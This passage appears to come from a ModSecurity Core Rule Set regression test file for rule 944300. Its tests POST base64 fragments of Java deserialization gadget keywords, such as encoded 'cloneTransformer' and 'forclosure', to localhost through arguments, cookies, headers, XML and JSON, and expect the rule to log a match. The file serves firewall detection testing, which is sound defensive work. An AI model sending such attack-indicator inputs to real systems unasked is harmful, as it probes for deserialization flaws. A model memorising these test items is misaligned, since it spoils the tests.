"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-78 - desc: "Argument name includes keyword GNsb25ldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "GNsb25ldHJhbnNmb3JtZXI=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-79 - desc: "Cookie test includes keyword GNsb25ldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=GNsb25ldHJhbnNmb3JtZXI - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-80 - desc: "Cookie name includes keyword GNsb25ldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: GNsb25ldHJhbnNmb3JtZXI=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-81 - desc: "Request header test includes keyword GNsb25ldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: GNsb25ldHJhbnNmb3JtZXI - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-82 - desc: "XML attribute value includes keyword GNsb25ldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-83 - desc: "XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-84 - desc: "Nested XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-85 - desc: "Content-Type text/plain includes keyword GNsb25ldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-86 - desc: "Content-Type application/json arg value includes keyword GNsb25ldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"GNsb25ldHJhbnNmb3JtZXI\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-87 - desc: "Content-Type application/json arg name includes keyword GNsb25ldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"GNsb25ldHJhbnNmb3JtZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-88 - desc: "Argument test includes keyword BjbG9uZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-89 - desc: "Argument name includes keyword BjbG9uZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "BjbG9uZXRyYW5zZm9ybWVy=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-90 - desc: "Cookie test includes keyword BjbG9uZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/x-www-form-urlencoded" - Cookie: test=BjbG9uZXRyYW5zZm9ybWVy - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-91 - desc: "Cookie name includes keyword BjbG9uZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BjbG9uZXRyYW5zZm9ybWVy=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-92 - desc: "Request header test includes keyword BjbG9uZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BjbG9uZXRyYW5zZm9ybWVy - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-93 - desc: "XML attribute value includes keyword BjbG9uZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - 
method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-94 - desc: "XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-95 - desc: "Nested XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-96 - desc: "Content-Type text/plain includes keyword BjbG9uZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-97 
- desc: "Content-Type application/json arg value includes keyword BjbG9uZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"BjbG9uZXRyYW5zZm9ybWVy\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-98 - desc: "Content-Type application/json arg name includes keyword BjbG9uZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"BjbG9uZXRyYW5zZm9ybWVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-99 - desc: "Argument test includes keyword Zm9yY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-100 - desc: "Argument name includes keyword Zm9yY2xvc3VyZQ" - stages: 
- - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "Zm9yY2xvc3VyZQ=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-101 - desc: "Cookie test includes keyword Zm9yY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Zm9yY2xvc3VyZQ - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-102 - desc: "Cookie name includes keyword Zm9yY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Zm9yY2xvc3VyZQ=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-103 - desc: "Request header test includes keyword Zm9yY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" 
- User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Zm9yY2xvc3VyZQ - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-104 - desc: "XML attribute value includes keyword Zm9yY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-105 - desc: "XML element value includes keyword Zm9yY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-106 - desc: "Nested XML element value includes keyword Zm9yY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-107 - desc: "Content-Type text/plain includes keyword Zm9yY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-108 - desc: "Content-Type application/json arg value includes keyword Zm9yY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"Zm9yY2xvc3VyZQ\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-109 - desc: "Content-Type application/json arg name includes keyword Zm9yY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"Zm9yY2xvc3VyZQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-110 - desc: "Argument test includes keyword GZvcmNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-111 - desc: "Argument name includes keyword GZvcmNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "GZvcmNsb3N1cmU=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-112 - desc: "Cookie test includes keyword GZvcmNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/x-www-form-urlencoded" - Cookie: test=GZvcmNsb3N1cmU - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-113 - desc: "Cookie name includes keyword GZvcmNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: GZvcmNsb3N1cmU=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-114 - desc: "Request header test includes keyword GZvcmNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: GZvcmNsb3N1cmU - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-115 - desc: "XML attribute value includes keyword GZvcmNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: 
"element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-116 - desc: "XML element value includes keyword GZvcmNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-117 - desc: "Nested XML element value includes keyword GZvcmNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-118 - desc: "Content-Type text/plain includes keyword GZvcmNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-119 - desc: "Content-Type application/json arg value includes keyword GZvcmNsb3N1cmU" - 
stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"GZvcmNsb3N1cmU\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-120 - desc: "Content-Type application/json arg name includes keyword GZvcmNsb3N1cmU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"GZvcmNsb3N1cmU\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-121 - desc: "Argument test includes keyword Bmb3JjbG9zdXJl" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 